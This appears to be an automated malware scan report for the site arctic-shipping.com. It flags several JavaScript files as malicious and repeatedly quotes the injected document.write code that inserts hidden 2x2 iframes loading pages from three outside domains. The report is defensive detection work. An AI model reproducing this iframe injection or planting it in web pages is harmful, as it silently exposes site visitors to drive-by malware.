Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=arctic-shipping.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://arctic-shipping.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://arctic-shipping.com/ | 200 OK Content-Length: 13542 Content-Type: text/html | clean |
http://arctic-shipping.com/publish_skins/CHNL/javascript.js | 200 OK Content-Length: 1773 Content-Type: application/javascript | clean |
http://arctic-shipping.com/jquery-1.3.2.min.js | 200 OK Content-Length: 57741 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cooptraiss.com/hezd.html?j=3203185></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3203185></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redboneskingston.com/haod.h Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://ajacofurniture.com/eaod.html?j=3203185 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3203185> Hidden iFrame found. size: 2x2 src: http://cooptraiss.com/hezd.html?j=3203185 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cooptraiss.com/hezd.html?j=3203185> Hidden iFrame found. size: 2x2 src: http://redboneskingston.com/haod.html?j=1476365 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redboneskingston.com/haod.html?j=1476365> | ||
http://arctic-shipping.com/js/jquery.galleryview-1.1.js | 200 OK Content-Length: 18825 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cooptraiss.com/hezd.html?j=3203185></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3203185></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redboneskingston.com/haod.h transition_speed: 400, transition_interval: 6000, overlay_opacity: 0.6, overlay_color: 'black', background_color: 'black', overlay_text_color: 'white', caption_text_color: 'white', border: '1px solid black', nav_theme: 'light', easing: 'swing', filmstrip_position: 'bottom', overlay_position: 'bottom', show_captions: false, fade_panels: true, pause_on_hover: false }; })(jQuery); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://cooptraiss.com/hezd.html?j=3203185 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cooptraiss.com/hezd.html?j=3203185> Hidden iFrame found. size: 2x2 src: http://redboneskingston.com/haod.html?j=1476365 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redboneskingston.com/haod.html?j=1476365> Hidden iFrame found. size: 2x2 src: http://ajacofurniture.com/eaod.html?j=3203185 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3203185> | ||
http://arctic-shipping.com/js/jquery.timers-1.1.2.js | 200 OK Content-Length: 3876 Content-Type: application/javascript | suspicious |
Hidden iFrame found. size: 2x2 src: http://ajacofurniture.com/eaod.html?j=3203185 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3203185> Hidden iFrame found. size: 2x2 src: http://cooptraiss.com/hezd.html?j=3203185 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cooptraiss.com/hezd.html?j=3203185> Hidden iFrame found. size: 2x2 src: http://redboneskingston.com/haod.html?j=1476365 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redboneskingston.com/haod.html?j=1476365> | ||
http://arctic-shipping.com/js/jquery.easing.1.3.js | 200 OK Content-Length: 8584 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cooptraiss.com/hezd.html?j=3203185></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3203185></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redboneskingston.com/haod.h return c*(7.5625*(t-=(1.5/2.75))*t + .75) + b; } else if (t < (2.5/2.75)) { return c*(7.5625*(t-=(2.25/2.75))*t + .9375) + b; } else { return c*(7.5625*(t-=(2.625/2.75))*t + .984375) + b; } }, easeInOutBounce: function (x, t, b, c, d) { if (t < d/2) return jQuery.easing.easeInBounce (x, t*2, 0, c, d) * .5 + b; return jQuery.easing.easeOutBounce (x, t*2-d, 0, c, d) * .5 + c*.5 + b; } }); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://ajacofurniture.com/eaod.html?j=3203185 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3203185> Hidden iFrame found. size: 2x2 src: http://cooptraiss.com/hezd.html?j=3203185 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cooptraiss.com/hezd.html?j=3203185> Hidden iFrame found. size: 2x2 src: http://redboneskingston.com/haod.html?j=1476365 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redboneskingston.com/haod.html?j=1476365> | ||
http://arctic-shipping.com/js/swfobject.js | 200 OK Content-Length: 7407 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cooptraiss.com/hezd.html?j=3203185></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3203185></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redboneskingston.com/haod.h Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://cooptraiss.com/hezd.html?j=3203185 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cooptraiss.com/hezd.html?j=3203185> Hidden iFrame found. size: 2x2 src: http://redboneskingston.com/haod.html?j=1476365 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redboneskingston.com/haod.html?j=1476365> Hidden iFrame found. size: 2x2 src: http://ajacofurniture.com/eaod.html?j=3203185 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3203185> | ||
http://arctic-shipping.com/js/AC_RunActiveContent.js | 200 OK Content-Length: 3719 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cooptraiss.com/hezd.html?j=3203185></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3203185></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redboneskingston.com/haod.h case "hspace": case "class": case "title": case "accesskey": case "name": case "id": case "tabindex": ret.embedAttrs[args[i]] = ret.objAttrs[args[i]] = args[i+1]; break; default: ret.embedAttrs[args[i]] = ret.params[args[i]] = args[i+1]; } } ret.objAttrs["classid"] = classid; if (mimeType) ret.embedAttrs["type"] = mimeType; return ret; } Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://ajacofurniture.com/eaod.html?j=3203185 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3203185> Hidden iFrame found. size: 2x2 src: http://redboneskingston.com/haod.html?j=1476365 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redboneskingston.com/haod.html?j=1476365> Hidden iFrame found. size: 2x2 src: http://cooptraiss.com/hezd.html?j=3203185 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cooptraiss.com/hezd.html?j=3203185> | ||
http://arctic-shipping.com/thickbox.js | 200 OK Content-Length: 12351 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cooptraiss.com/hezd.html?j=3203185></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3203185></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redboneskingston.com/haod.h var h = window.innerHeight || self.innerHeight || (de&&de.clientHeight) || document.body.clientHeight; arrayPageSize = [w,h]; return arrayPageSize; } function tb_detectMacXFF() { var userAgent = navigator.userAgent.toLowerCase(); if (userAgent.indexOf('mac') != -1 && userAgent.indexOf('firefox')!=-1) { return true; } } Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://cooptraiss.com/hezd.html?j=3203185 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cooptraiss.com/hezd.html?j=3203185> Hidden iFrame found. size: 2x2 src: http://redboneskingston.com/haod.html?j=1476365 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redboneskingston.com/haod.html?j=1476365> Hidden iFrame found. size: 2x2 src: http://ajacofurniture.com/eaod.html?j=3203185 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3203185> | ||
http://arctic-shipping.com/js/jquery.jcarusel.js | 200 OK Content-Length: 2870 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cooptraiss.com/hezd.html?j=3203185></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3203185></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redboneskingston.com/haod.h Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://ajacofurniture.com/eaod.html?j=3203185 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3203185> Hidden iFrame found. size: 2x2 src: http://cooptraiss.com/hezd.html?j=3203185 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cooptraiss.com/hezd.html?j=3203185> Hidden iFrame found. size: 2x2 src: http://redboneskingston.com/haod.html?j=1476365 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://redboneskingston.com/haod.html?j=1476365> | ||
http://arctic-shipping.com/js/nivoslider/jquery.nivo.slider.pack.js | 200 OK Content-Length: 6550 Content-Type: application/javascript | clean |
http://millerusa.net/806507.js | 521 Origin Down Content-Length: 5914 Content-Type: text/html | clean |
http://millerusa.net//cdnjs.cloudflare.com/ajax/libs/zepto/1.0/zepto.min.js/ | 521 Origin Down Content-Length: 6575 Content-Type: text/html | clean |
http://millerusa.net/cdn-cgi/scripts/cf.common.js | 200 OK Content-Length: 4930 Content-Type: application/javascript | clean |
http://millerusa.net/test404page.js | 521 Origin Down Content-Length: 5914 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: arctic-shipping.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 03 Jun 2014 23:03:50 GMT
Pragma: no-cache
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny13 with Suhosin-Patch
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=24149fc685ea44a84f0f251d013b4894; path=/
X-Powered-By: PHP/5.2.6-1+lenny13
GET / HTTP/1.1
Host: arctic-shipping.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 03 Jun 2014 23:03:50 GMT
Pragma: no-cache
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny13 with Suhosin-Patch
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=24149fc685ea44a84f0f251d013b4894; path=/
X-Powered-By: PHP/5.2.6-1+lenny13
Second query (visit from search engine):
GET / HTTP/1.1
Host: arctic-shipping.com
Referer: http://www.google.com/search?q=arctic-shipping.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: arctic-shipping.com
Referer: http://www.google.com/search?q=arctic-shipping.com
Result:
The result is similar to the first query. There are no suspicious redirects found.